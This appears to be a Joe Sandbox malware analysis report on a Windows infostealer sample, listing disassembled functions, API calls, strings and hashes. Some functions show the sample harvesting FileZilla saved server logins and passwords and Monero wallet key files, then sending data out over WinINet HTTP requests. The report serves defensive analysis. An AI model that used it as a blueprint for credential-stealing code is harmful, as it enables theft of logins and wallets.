                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 79e1d96046c1b11e9f689ebfca26dba6badb28a0f23823ae9b9f4e94746568e1
                                    • Instruction ID: a6cf5978502afc3932d6a7776a197f03e12d438429ac6e95bf93d8a6e839d948
                                    • Opcode Fuzzy Hash: 79e1d96046c1b11e9f689ebfca26dba6badb28a0f23823ae9b9f4e94746568e1
                                    • Instruction Fuzzy Hash: 3E51B0B3D082109FE3006E29EC8576AFBE5EB94310F1B493DDAD893744E67958548BC7
                                    Function 012E7CB4 Relevance: .2, Instructions: 157COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b78decc414097db23cbad8cb77b8910555b1a4d3e06721360cab9746c3d71ede
                                    • Instruction ID: e7bf319b5ece0014e136f71be42998a081428a01a8bb0fb075b6537be866dae2
                                    • Opcode Fuzzy Hash: b78decc414097db23cbad8cb77b8910555b1a4d3e06721360cab9746c3d71ede
                                    • Instruction Fuzzy Hash: 134155F3E181149BE300AE7CEC45767B6E9DBD0720F2A493CD988D7380E9B9980583C2
                                    Function 01472296 Relevance: .1, Instructions: 116COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 17ed49d0286cda44c208cea3ba5a736c5021dd24906c6d4ababee80fcb427080
                                    • Instruction ID: 34df304184b6f869e765693e7c5ffb4d9173dc26f85d868960787ae399ca3d32
                                    • Opcode Fuzzy Hash: 17ed49d0286cda44c208cea3ba5a736c5021dd24906c6d4ababee80fcb427080
                                    • Instruction Fuzzy Hash: EE31C7F261C600DFD344AF35C881EBAB7E9EB44340F06492FD6C687764E6B594428753
                                    Function 0146A67E Relevance: .1, Instructions: 96COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ba206a0a2aa2caf054df1383b7a8b19442f1bf7b3037f96c4841ae399a06566e
                                    • Instruction ID: 9fb1110bd96aaf1cab1e37b6071ed44ac5731c3dfa981d5ca04fdff8125a173a
                                    • Opcode Fuzzy Hash: ba206a0a2aa2caf054df1383b7a8b19442f1bf7b3037f96c4841ae399a06566e
                                    • Instruction Fuzzy Hash: 3F3149B280C610EFE301BF59D8816AAFBE5FF58351F02882DEAC893610E6315840CBD3
                                    Function 00FF9750 Relevance: .0, Instructions: 15COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    Function 00FF0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FF8E0B
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                      • Part of subcall function 00FE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FE99EC
                                      • Part of subcall function 00FE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FE9A11
                                      • Part of subcall function 00FE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FE9A31
                                      • Part of subcall function 00FE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FE148F,00000000), ref: 00FE9A5A
                                      • Part of subcall function 00FE99C0: LocalFree.KERNEL32(00FE148F), ref: 00FE9A90
                                      • Part of subcall function 00FE99C0: CloseHandle.KERNEL32(000000FF), ref: 00FE9A9A
                                      • Part of subcall function 00FF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FF8E52
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,01000DBA,01000DB7,01000DB6,01000DB3), ref: 00FF0362
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF0369
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00FF0385
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01000DB2), ref: 00FF0393
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 00FF03CF
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01000DB2), ref: 00FF03DD
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00FF0419
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01000DB2), ref: 00FF0427
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00FF0463
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01000DB2), ref: 00FF0475
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01000DB2), ref: 00FF0502
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01000DB2), ref: 00FF051A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01000DB2), ref: 00FF0532
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01000DB2), ref: 00FF054A
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00FF0562
                                    • lstrcat.KERNEL32(?,profile: null), ref: 00FF0571
                                    • lstrcat.KERNEL32(?,url: ), ref: 00FF0580
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF0593
                                    • lstrcat.KERNEL32(?,01001678), ref: 00FF05A2
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF05B5
                                    • lstrcat.KERNEL32(?,0100167C), ref: 00FF05C4
                                    • lstrcat.KERNEL32(?,login: ), ref: 00FF05D3
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF05E6
                                    • lstrcat.KERNEL32(?,01001688), ref: 00FF05F5
                                    • lstrcat.KERNEL32(?,password: ), ref: 00FF0604
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FF0617
                                    • lstrcat.KERNEL32(?,01001698), ref: 00FF0626
                                    • lstrcat.KERNEL32(?,0100169C), ref: 00FF0635
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01000DB2), ref: 00FF068E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 1942843190-555421843
                                    • Opcode ID: 1488da8b6d541db1134a6280709254ff8db4caef43faf01efcc825a92e4968b2
                                    • Instruction ID: 090673f74c93e4280bd3026d4ada89d8b58c385fe1a970402f25fdc624794b25
                                    • Opcode Fuzzy Hash: 1488da8b6d541db1134a6280709254ff8db4caef43faf01efcc825a92e4968b2
                                    • Instruction Fuzzy Hash: 7FD120B190010CABDB14FBE0DD9AEFE7378AF14340F444418F206A75A5EF78AA06DB61
                                    Function 00FE5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                      • Part of subcall function 00FE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FE4839
                                      • Part of subcall function 00FE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FE4849
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FE59F8
                                    • StrCmpCA.SHLWAPI(?,0180EB30), ref: 00FE5A13
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE5B93
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0180EB40,00000000,?,0180A508,00000000,?,01001A1C), ref: 00FE5E71
                                    • lstrlen.KERNEL32(00000000), ref: 00FE5E82
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00FE5E93
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FE5E9A
                                    • lstrlen.KERNEL32(00000000), ref: 00FE5EAF
                                    • lstrlen.KERNEL32(00000000), ref: 00FE5ED8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00FE5EF1
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00FE5F1B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00FE5F2F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00FE5F4C
                                    • InternetCloseHandle.WININET(00000000), ref: 00FE5FB0
                                    • InternetCloseHandle.WININET(00000000), ref: 00FE5FBD
                                    • HttpOpenRequestA.WININET(00000000,0180EBC0,?,0180E5C0,00000000,00000000,00400100,00000000), ref: 00FE5BF8
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                    • InternetCloseHandle.WININET(00000000), ref: 00FE5FC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 874700897-2180234286
                                    • Opcode ID: e94d1bc2f529aa4c9d1edc1756d1522141870320a0fe4fffc9e820c7a088ee7f
                                    • Instruction ID: 77695cd8bae0ebfdeb768435a6cbdd43a0e5a99eb9bd5752e3e7e98037abee28
                                    • Opcode Fuzzy Hash: e94d1bc2f529aa4c9d1edc1756d1522141870320a0fe4fffc9e820c7a088ee7f
                                    • Instruction Fuzzy Hash: 831221B181011CAADB25EBA0DC95FFE7378BF14740F4041A9F20A621A1EFB46B49DF55
                                    Function 00FECEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                      • Part of subcall function 00FF8B60: GetSystemTime.KERNEL32(01000E1A,0180A988,010005AE,?,?,00FE13F9,?,0000001A,01000E1A,00000000,?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FF8B86
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FECF83
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FED0C7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FED0CE
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FED208
                                    • lstrcat.KERNEL32(?,01001478), ref: 00FED217
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FED22A
                                    • lstrcat.KERNEL32(?,0100147C), ref: 00FED239
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FED24C
                                    • lstrcat.KERNEL32(?,01001480), ref: 00FED25B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FED26E
                                    • lstrcat.KERNEL32(?,01001484), ref: 00FED27D
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FED290
                                    • lstrcat.KERNEL32(?,01001488), ref: 00FED29F
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FED2B2
                                    • lstrcat.KERNEL32(?,0100148C), ref: 00FED2C1
                                    • lstrcat.KERNEL32(?,00000000), ref: 00FED2D4
                                    • lstrcat.KERNEL32(?,01001490), ref: 00FED2E3
                                      • Part of subcall function 00FFA820: lstrlen.KERNEL32(00FE4F05,?,?,00FE4F05,01000DDE), ref: 00FFA82B
                                      • Part of subcall function 00FFA820: lstrcpy.KERNEL32(01000DDE,00000000), ref: 00FFA885
                                    • lstrlen.KERNEL32(?), ref: 00FED32A
                                    • lstrlen.KERNEL32(?), ref: 00FED339
                                      • Part of subcall function 00FFAA70: StrCmpCA.SHLWAPI(018090E0,00FEA7A7,?,00FEA7A7,018090E0), ref: 00FFAA8F
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FED3B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                    • String ID:
                                    • API String ID: 1956182324-0
                                    • Opcode ID: dec7f9fe0500df7f3556e506bb14f1aa3d1af29b52db147ffa0e64b3facff063
                                    • Instruction ID: b613bc07538c0aa9c4946873d566f7792743cd124d814593baaa39a79e8d18cb
                                    • Opcode Fuzzy Hash: dec7f9fe0500df7f3556e506bb14f1aa3d1af29b52db147ffa0e64b3facff063
                                    • Instruction Fuzzy Hash: 06E145B1910108ABDB24EFA0DD95EFE7378BF14300F104158F60BA75A5DF79AA05DB62
                                    Function 00FE4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                      • Part of subcall function 00FE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FE4839
                                      • Part of subcall function 00FE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FE4849
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FE4915
                                    • StrCmpCA.SHLWAPI(?,0180EB30), ref: 00FE493A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE4ABA
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,01000DDB,00000000,?,?,00000000,?,",00000000,?,0180EAB0), ref: 00FE4DE8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00FE4E04
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00FE4E18
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FE4E49
                                    • InternetCloseHandle.WININET(00000000), ref: 00FE4EAD
                                    • InternetCloseHandle.WININET(00000000), ref: 00FE4EC5
                                    • HttpOpenRequestA.WININET(00000000,0180EBC0,?,0180E5C0,00000000,00000000,00400100,00000000), ref: 00FE4B15
